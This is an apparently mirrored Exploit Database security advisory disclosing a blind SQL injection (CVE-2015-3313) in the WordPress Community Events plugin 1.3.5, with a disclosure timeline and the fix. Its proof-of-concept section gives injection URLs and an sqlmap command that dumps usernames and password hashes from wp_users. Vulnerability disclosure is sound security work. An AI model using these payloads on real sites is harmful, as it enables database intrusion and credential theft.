WordPress Plugin Community Events 1.3.5 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Hannes Trunde
  日期： 2015-04-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36805/

• =======================================================================
  title: SQL Injection
  product: WordPress Community Events Plugin
   vulnerable version: 1.3.5 (and probably below)
  fixed version: 1.4
   CVE number: CVE-2015-3313
   impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
   homepage: https://wordpress.org/plugins/community-events/
  found: 2015-01-07
   by: Hannes Trunde
   
   mail: hannes.trunde@gmail.com
  twitter: @hannestrunde
  
  =======================================================================
  
  
  Plugin description:
  -------------------
  "The purpose of this plugin is to allow users to create a schedule of upcoming 
  events and display events for the next 7 days in an AJAX-driven box or 
  displaying a full list of upcoming events."
  
  Source: https://wordpress.org/plugins/community-events/
  
  
  Recommendation:
  ---------------
  The author has provided a fixed plugin version which should be installed 
  immediately.
  
  
  Vulnerability overview/description:
  -----------------------------------
  Because of insufficient input validation, a blind SQL injection attack can be
  performed within the search function to obtain sensitive information from the 
  database. To exploit this vulnerability, there has to be at least one planned 
  event on the calendar.
  
  
  Proof of concept:
  -----------------
  The following HTTP request to the Community Events full schedule returns the 
  event(s) planned in the specified year:
  ===============================================================================
  http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1
  ===============================================================================
  
  The following HTTP request returns a blank page, thus confirming the blind SQL
  injection vulnerability:
  ===============================================================================
  http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1
  ===============================================================================
  
  Obtaining users and password hashes with sqlmap may look as follows (--string 
  parameter has to contain (part of) the name of the event, enabling sqlmap to 
  differentiate between true and false statements):
  ================================================================================
  sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"
  ================================================================================
  
  
  Contact timeline:
  -----------------
  2015-04-08: Contacting author via mail.
  2015-04-09: Author replies and announces a fix within a week.
  2015-04-12: Mail from author, stating that plugin has been updated.
  2015-04-14: Posting information to the open source software security mailing 
  list: http://openwall.com/lists/oss-security/2015/04/14/5
  2015-04-18: Release of security advisory.
  
  
  Solution:
  ---------
  Update to the most recent plugin version.
  
  
  Workaround:
  -----------
  See solution.